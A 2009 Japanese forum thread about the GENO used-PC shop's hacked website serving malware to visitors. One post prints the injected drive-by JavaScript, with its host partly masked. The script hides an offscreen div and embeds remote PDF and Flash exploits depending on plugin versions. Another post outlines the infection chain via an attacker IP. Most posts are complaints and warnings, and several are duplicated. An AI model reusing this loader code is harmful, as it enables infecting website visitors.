【ウイルス感染】GENOを語るスレ30【アクセス注意】
中古PCとPCパーツの通販ショップ、GENOを語るスレ
ttp://www.geno-web.jp/ (アクセス注意)
GENOとは…?
業者から回収したPCを売る通販サイト
良品中古とかいてあるがただの中古品
この店を褒める人がいるが大体は中の人
本日も今日のGENO AM1時にシコシコ更新中と思いきや
土曜から月曜までウイルス配信中
>779 : オオバクロモジ(北海道) :2009/04/06(月) 16:24:39.80 (p)ID:81Mt9WVB(2)
>現状
>
>少しの間落ちていたラトビア鯖が復活した。
>www.juicyrock.co.jpは403になったので問題なし。
>www.geno-web.jpのトップページ以外のページはまだ公開中&改竄されたままなので
>開くと感染の恐れあり
前スレ
http://pc11.2ch.net/test/read.cgi/pc/1237696091/
【注文0.1】Genoのサイトでウイルス感染…?★4 (ニュース速報板)
http://tsushima.2ch.net/test/read.cgi/news/1238979735/788-
ttp://www.geno-web.jp/ (アクセス注意)
GENOとは…?
業者から回収したPCを売る通販サイト
良品中古とかいてあるがただの中古品
この店を褒める人がいるが大体は中の人
本日も今日のGENO AM1時にシコシコ更新中と思いきや
土曜から月曜までウイルス配信中
>779 : オオバクロモジ(北海道) :2009/04/06(月) 16:24:39.80 (p)ID:81Mt9WVB(2)
>現状
>
>少しの間落ちていたラトビア鯖が復活した。
>www.juicyrock.co.jpは403になったので問題なし。
>www.geno-web.jpのトップページ以外のページはまだ公開中&改竄されたままなので
>開くと感染の恐れあり
前スレ
http://pc11.2ch.net/test/read.cgi/pc/1237696091/
【注文0.1】Genoのサイトでウイルス感染…?★4 (ニュース速報板)
http://tsushima.2ch.net/test/read.cgi/news/1238979735/788-
|
|
|
GENO WAY
ここに来る前、見てきたばかりだ…
当分はGENOにアクセスするのは止めておこう。
だからavastにしとけっつったろ?
たった40GBのHDDなのに、avastでスキャン始めて
5時間たっても終わらない。
5時間たっても終わらない。
これってトップだけなら問題ないんかな?
8 :名無しさん:2009/04/06(月) 18:02:13 0
GENO OVER
なんでテンプレを消してるんだ?
10 :名無しさん:2009/04/06(月) 18:08:20 0
>1
乙
昨日Firefoxが落ちたのはオーバークロックのせいだと思ってた
乙
昨日Firefoxが落ちたのはオーバークロックのせいだと思ってた
ここまで調べた。一部伏字。
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{ob
j=new ActiveXObject("PDF.PdfCtrl");}catch(e){}}if(obj)document.write('<embed s
rc="http://xxx/news/?id=2" width=100 height=100 type="application/pdf"></e
mbed>');try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlas
h.9")).GetVariable("$"+"version").split(",");}catch(e){}if(FV&&(FV[2]<124))docum
ent.write('<object classid="clsid:xxx" width=100 height=100 align=middle><para
m name="movie" value="http://xxx/news/?id=3"/><param name="quality" val
ue="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://xxx/
news/?id=3"/></embed></object>');document.write("</div>");
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{ob
j=new ActiveXObject("PDF.PdfCtrl");}catch(e){}}if(obj)document.write('<embed s
rc="http://xxx/news/?id=2" width=100 height=100 type="application/pdf"></e
mbed>');try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlas
h.9")).GetVariable("$"+"version").split(",");}catch(e){}if(FV&&(FV[2]<124))docum
ent.write('<object classid="clsid:xxx" width=100 height=100 align=middle><para
m name="movie" value="http://xxx/news/?id=3"/><param name="quality" val
ue="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://xxx/
news/?id=3"/></embed></object>');document.write("</div>");
>5 : ポレオニウム・ボレアレ(長屋) :2009/04/06(月) 18:21:09.74 (p)ID:8a6lRuWY(2) (p)?PLT(12111)
>(1)感染したWebページをひらく
>(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
>(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
>(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
>(5)bufferOverrunでウィルス本体の起動を試行
>感染した場合
>パスワードなどの個人情報が抜かれている可能性あり
>いつものバックドア系ウイルスなんだけど、今回なんか変だな
>・PDFファイルとかシステムファイルがなぜか増殖する
>・メモリを馬鹿食いする
>・再起動時にブルースクリーン
>とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな
>対策
>WindowsUpdate
>PDFリーダーを最新にする (AdobeReader や Foxit Reader)
>AdobeFlashを最新にする
>94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
>Javascriptを切る
>スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)
>(1)感染したWebページをひらく
>(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
>(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
>(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
>(5)bufferOverrunでウィルス本体の起動を試行
>感染した場合
>パスワードなどの個人情報が抜かれている可能性あり
>いつものバックドア系ウイルスなんだけど、今回なんか変だな
>・PDFファイルとかシステムファイルがなぜか増殖する
>・メモリを馬鹿食いする
>・再起動時にブルースクリーン
>とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな
>対策
>WindowsUpdate
>PDFリーダーを最新にする (AdobeReader や Foxit Reader)
>AdobeFlashを最新にする
>94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
>Javascriptを切る
>スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)
以下、下記2ちゃんページより
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
22 名前:名無しの報告[sage] 投稿日:2009/04/06(月) 09:59:12 ID:p18SSJ3j0
【news】ニュース速報運用情報256【ν】
http://qb5.2ch.net/test/read.cgi/operate/1238958488/24-25
24 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2009/04/06(月) 09:55:22 ID:wm65uoBa0
【注文0.1】Genoのサイトでウイルス感染…か?★3
http://tsushima.2ch.net/test/read.cgi/news/1238944195/
誰か次スレ立ててくれませんか?
25 名前: [―{}@{}@{}-] たまご ◆EGGMAN.HlI [sage] 投稿日:2009/04/06(月) 09:57:08 ID:2oiP+u0O0
俺がウイルス貼るのおもしろいからお断り
こいつ?
23 名前:名無しの報告[sage] 投稿日:2009/04/06(月) 10:07:19 ID:h1+xBuaSP
またたまごか
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
22 名前:名無しの報告[sage] 投稿日:2009/04/06(月) 09:59:12 ID:p18SSJ3j0
【news】ニュース速報運用情報256【ν】
http://qb5.2ch.net/test/read.cgi/operate/1238958488/24-25
24 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2009/04/06(月) 09:55:22 ID:wm65uoBa0
【注文0.1】Genoのサイトでウイルス感染…か?★3
http://tsushima.2ch.net/test/read.cgi/news/1238944195/
誰か次スレ立ててくれませんか?
25 名前: [―{}@{}@{}-] たまご ◆EGGMAN.HlI [sage] 投稿日:2009/04/06(月) 09:57:08 ID:2oiP+u0O0
俺がウイルス貼るのおもしろいからお断り
こいつ?
23 名前:名無しの報告[sage] 投稿日:2009/04/06(月) 10:07:19 ID:h1+xBuaSP
またたまごか
15 :名無しさん:2009/04/06(月) 18:38:38 0
ええとお詫びのメールもなしですか。
もしかして顧客情報を別管理していなかったのか?
もしかして顧客情報を別管理していなかったのか?
全てはこのレスから始まった
326 名前:名無しさん 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?
326 名前:名無しさん 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?
17 :名無しさん:2009/04/06(月) 18:46:13 0
メールにもウィルスありそうだから
送ってこなくていい
謝罪文HP載せても
見に行くのも嫌だ
どうしようもないね
送ってこなくていい
謝罪文HP載せても
見に行くのも嫌だ
どうしようもないね
店舗での対応
553 名前:名無しさん 投稿日:2009/04/05(日) 16:02:30 0
webのことは店舗では分かりません
期待通りの回答
さすがだ
554 名前:名無しさん 投稿日:2009/04/05(日) 16:04:33 0
>>553
電話したの?
ご連絡ありがとうございます程度も言わなかったの?
663 名前:名無しさん 投稿日:2009/04/05(日) 21:31:15 0
>>554
じゃんじゃん亭で買い物してから南下、GENOへ寄ったついでに聞いてみた
何言ってるんだ?こいつといった感じの対応
553 名前:名無しさん 投稿日:2009/04/05(日) 16:02:30 0
webのことは店舗では分かりません
期待通りの回答
さすがだ
554 名前:名無しさん 投稿日:2009/04/05(日) 16:04:33 0
>>553
電話したの?
ご連絡ありがとうございます程度も言わなかったの?
663 名前:名無しさん 投稿日:2009/04/05(日) 21:31:15 0
>>554
じゃんじゃん亭で買い物してから南下、GENOへ寄ったついでに聞いてみた
何言ってるんだ?こいつといった感じの対応
まあgenoは被害者だから仕方ない。
悪いのはウイルスばら撒いた奴であってウイルスに感染させられた奴じゃない。
インフルエンザにかかった奴がマスクせずに外出するようなもの。
悪気はないんだから。
悪いのはウイルスばら撒いた奴であってウイルスに感染させられた奴じゃない。
インフルエンザにかかった奴がマスクせずに外出するようなもの。
悪気はないんだから。
20 :名無しさん:2009/04/06(月) 18:54:55 0
前々(?)スレにGENOの通販システムを自社開発例として挙げていた会社があったよね。
GENO側はDBのデータ入出力と簡単なHTMLをやるだけだろうから、もしかして鯖官の会社の責任では?
GENO側はDBのデータ入出力と簡単なHTMLをやるだけだろうから、もしかして鯖官の会社の責任では?
21 :名無しさん:2009/04/06(月) 18:55:35 0
>19
社員乙
処で未だに改ざんされたページにアクセス出来る訳だがどうして?
社員乙
処で未だに改ざんされたページにアクセス出来る訳だがどうして?
22 :名無しさん:2009/04/06(月) 18:57:13 0
GENO側には連絡とれたの?土日の間。
GENOも悪い
鯖を落とせばいいのに、落とさないGENOは極悪
インフルエンザにかかっているものは
自ら死んで感染を防いでねと言いたいのか?
お前らクズだな。
自ら死んで感染を防いでねと言いたいのか?
お前らクズだな。
まさかとは思うが、GENOは警察に被害を届けたよな?
届けてないなら、問題じゃないか。
いつ届けたか、報告してもらわないとな。
届けてないなら、問題じゃないか。
いつ届けたか、報告してもらわないとな。
商品ページも見れるし注文も出来てワロタ
29 :名無しさん:2009/04/06(月) 19:06:15 O
このまま夜逃げ
>>23
whoisデータベースに載ってる電話番号が「現在使われておりません」だったよ。
whoisデータベースに載ってる電話番号が「現在使われておりません」だったよ。
被害を放置してでも週明けまでは稼ぎたいし、(←自分だけ死活問題 by >26)
休日は休みたいのだよ。(←だから悪気は無い by >19)
…悪くないのかw
休日は休みたいのだよ。(←だから悪気は無い by >19)
…悪くないのかw
そして伝説へ・・・
情報が盗まれてる可能性は、あっても今回のウイルスは、動作に変化はないの?
GENOのページ開く→アドビリーダーの同意しますか(初回起動だったかも)
でIEが重たくなって応答なし→タスクマネージャーで終了って流れだったんですが。
今は、これまで通りの快適さなんですが。
GENOのページ開く→アドビリーダーの同意しますか(初回起動だったかも)
でIEが重たくなって応答なし→タスクマネージャーで終了って流れだったんですが。
今は、これまで通りの快適さなんですが。
TROJ_GENOME.BK
ワロスwww
ワロスwww
35 :名無しさん:2009/04/06(月) 19:19:12 0
どこがつけた名前だよ
GENOから訴えられるレベルだな
GENOから訴えられるレベルだな
だってしょうがないじゃない
アンサイクロペディアに載せてくるか
39 :名無しさん:2009/04/06(月) 19:23:19 0
なんだ結局ウイルスじゃなかったのか。
騒いでいる奴は司法からきつーいお仕置きを
受ける事になるだろうな。
騒いでいる奴は司法からきつーいお仕置きを
受ける事になるだろうな。
司法からきつーいお仕置き(笑)
お仕置きだべぇ
立法機関から提訴だろう
>>38
まだ生きてるww
ウィルスでもウィルスでないにしても
中のシステムファイル起動させたりしているんだから
トロイみたいなもんだろ
ましてやこっちに被害がなくとも
あっちから抜かれてる可能性が残ってるし
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up25730.jpg
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up25731.jpg
まだ生きてるww
ウィルスでもウィルスでないにしても
中のシステムファイル起動させたりしているんだから
トロイみたいなもんだろ
ましてやこっちに被害がなくとも
あっちから抜かれてる可能性が残ってるし
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up25730.jpg
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up25731.jpg
ウィルスだろうと無かろうと、GENOが外部からWebサイト書き換えられたって事実は変わらんのだけどw
これでcmd.exeが起動できるように書き換えられてたので
あっちもcmd.exeが起動しているのは極めて高いから
webサイト”だけ”ではないんだよな
個人情報ぬかれちゃ困るだろ
あっちもcmd.exeが起動しているのは極めて高いから
webサイト”だけ”ではないんだよな
個人情報ぬかれちゃ困るだろ
47 :名無しさん:2009/04/06(月) 19:42:49 0
Top画面の[ログイン]のリンクからだと、
全商品見れるみたいだな
全商品見れるみたいだな
エロマンガを落としてる奴注意な
50 :名無しさん:2009/04/06(月) 19:50:11 0
ブラクラですね
漏れには通用せんよ
漏れには通用せんよ
>>43ブラクラじゃない
53 :名無しさん:2009/04/06(月) 19:54:24 0
>>50
これも迂闊には開けないな
これも迂闊には開けないな
54 :名無しさん:2009/04/06(月) 19:57:10 0
GENO閉鎖もしないでだんまりはねえだろ
感染していまだに気づいてない客だっているだろうに
酷すぎだよこの店
感染していまだに気づいてない客だっているだろうに
酷すぎだよこの店
閉鎖という名のザル
http://www.wmc.gr.jp/security/crack1.htm
ここに対策が(ry
ここに対策が(ry
57 :名無しさん:2009/04/06(月) 20:00:39 0
>53
ググレカス
ググレカス
58 :名無しさん:2009/04/06(月) 20:02:09 0
>56
Phenom X4 9950 BE 2.9GHz×4なので平気
Phenom X4 9950 BE 2.9GHz×4なので平気
59 :名無しさん:2009/04/06(月) 20:06:13 0
ブラクラにみんな掛かったのか?
>>57
意外と汚染されてるかもしれんぞwwwww
意外と汚染されてるかもしれんぞwwwww
土曜日からウィルススキャンしまくりでHDDの寿命が縮みました
genoでググって感染したヤツもいるだろうな・・・
3 :名無しさん:2009/04/06(月) 16:54:44 0
ここに来る前、見てきたばかりだ…
ここに来る前、見てきたばかりだ…
謝罪メールにもウイルスくっついてたら面白いのにw
TROJ_GENOME.BK
職場でNW管理やってんだけど、このウイルスが出たって問い合わせが今日凄かった
GENOねえとか思ってたけど、ほんとにGENO絡みだったのか
職場でNW管理やってんだけど、このウイルスが出たって問い合わせが今日凄かった
GENOねえとか思ってたけど、ほんとにGENO絡みだったのか
通称GENOウイルスになりそうだな
通称キンタマのように・・・
flashってほぼ全てが入れてるだろうし、JavaScriptなんて切ってる奴なんてほとんど居ないだろう。
通称キンタマのように・・・
flashってほぼ全てが入れてるだろうし、JavaScriptなんて切ってる奴なんてほとんど居ないだろう。
本気でむかついてきた
まさかの再開キターw
そのまままたウイルス垂れ流してるらしいけどマジか。。
顧客情報もだけど、もっと大事なの全部抜かれて
もはやウイルス垂れ流しとかどうでもいいのかな
もはやウイルス垂れ流しとかどうでもいいのかな
ちょw謝罪無しのまま営業再開?!
>>69
avastのWebシールドで確かめてみれば?
avastのWebシールドで確かめてみれば?
74 :名無しさん:2009/04/06(月) 20:36:10 0
サーバに一部不具合がございました
現在は解消されております
多大なご迷惑をおかけし
大変申し訳
ございませんでした
現在は解消されております
多大なご迷惑をおかけし
大変申し訳
ございませんでした
まさかの謝罪無しwwwwwwwwwwwwwww
チラ裏だが、復活しようがしまいが、
俺がここで買い物をすることはないな。
俺がここで買い物をすることはないな。
79 :名無しさん:2009/04/06(月) 20:40:11 0
これで特売品が買いやすくなるな
よしよしと
対策さえしていれば問題ない
よしよしと
対策さえしていれば問題ない
>>79
いやいやねーよw
いやいやねーよw
もう完全にラトビア人の支配下にあるのだよ
本当の惨劇はこれからかもしれんぞ・・・
本当の惨劇はこれからかもしれんぞ・・・
ラトビア人の末裔
これ本当に大丈夫なのか?
GENOって価格.com規模じゃないからこのまま垂れ流しって可能性は
高いんでないかい?
NW管理者って言っても所詮WEBデザイナークラスでしょ?
GENOって価格.com規模じゃないからこのまま垂れ流しって可能性は
高いんでないかい?
NW管理者って言っても所詮WEBデザイナークラスでしょ?
これって、感染してたら駆除できないまでもウイルスとして検出できるんですかね?
avast入れるのがいいんだろうけど競合するんだよな。。
avast入れるのがいいんだろうけど競合するんだよな。。
FirefoxとかOperaにNoScript入れて最低限必要なドメインだけ許可して使うのが普通だと思ってた
相変わらずウイルス垂れ流しでワロタ
相変わらずウイルス垂れ流しでワロタ
怖いのは今まで信頼のおけた通販サイトのみ許可しても
突如ウイルスHPに変わるという恐怖
突如ウイルスHPに変わるという恐怖
GENO完全にオワタ\(^o^)/
まさかのウイルス対策セール来た!!!
しかもそのページでウイルス反応アリwwwwwwwwwwww
http://up2.viploader.net/pic/src/viploader970234.jpg
しかもそのページでウイルス反応アリwwwwwwwwwwww
http://up2.viploader.net/pic/src/viploader970234.jpg
ホモゲノの中の奴リアルで馬鹿だろ
事後対応が朝日放送なんかと一緒
事後対応が朝日放送なんかと一緒
ゲノすごすぎる
ウイルス配布再開か
ウイルス配布再開か
証拠用メモ
4日午後〜6日朝までアクセスするとウイルスにひっかかる
6日朝〜メンテ。その間もアクセスするとウイルスにひっかかる
6日20時頃再開。メンテ後もアクセスするとウイルスにひっかかる
GENOの対応
6日再開後 サーバーに一部不具合がありました
4日午後〜6日朝までアクセスするとウイルスにひっかかる
6日朝〜メンテ。その間もアクセスするとウイルスにひっかかる
6日20時頃再開。メンテ後もアクセスするとウイルスにひっかかる
GENOの対応
6日再開後 サーバーに一部不具合がありました
もしかしてまた明日の朝まで放置プレイ??
治ってねーのかよwww
これは吹くwwwwwwwwwwww
サーバに一部不具合がございました
現在は解消されております
多大なご迷惑をおかけし
大変申し訳
ございませんでした
してねーよw
現在は解消されております
多大なご迷惑をおかけし
大変申し訳
ございませんでした
してねーよw
97 :名無しさん:2009/04/06(月) 20:49:56 0
トレンドマイクロより
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GENOME.BK
ジェノウィルス命名されました
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GENOME.BK
ジェノウィルス命名されました
GENOバカすぐるwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
560 ムラサキナズナ(アラバマ州) [sage] Date:2009/04/06(月) 20:49:44.48 ID:0ucSszJC Be:
GENOの中の人見てるのかな
ttp://www.geno.co.jp/xmlrss/07/geno_xml07.js
が修正された。
見てたら一言、あんたすごくバカ。
他のやられてるファイル全然そのままだよ。
もう一回遮断してちゃんとチェックしたらw
560 ムラサキナズナ(アラバマ州) [sage] Date:2009/04/06(月) 20:49:44.48 ID:0ucSszJC Be:
GENOの中の人見てるのかな
ttp://www.geno.co.jp/xmlrss/07/geno_xml07.js
が修正された。
見てたら一言、あんたすごくバカ。
他のやられてるファイル全然そのままだよ。
もう一回遮断してちゃんとチェックしたらw
今までここまで酷い対応見たことない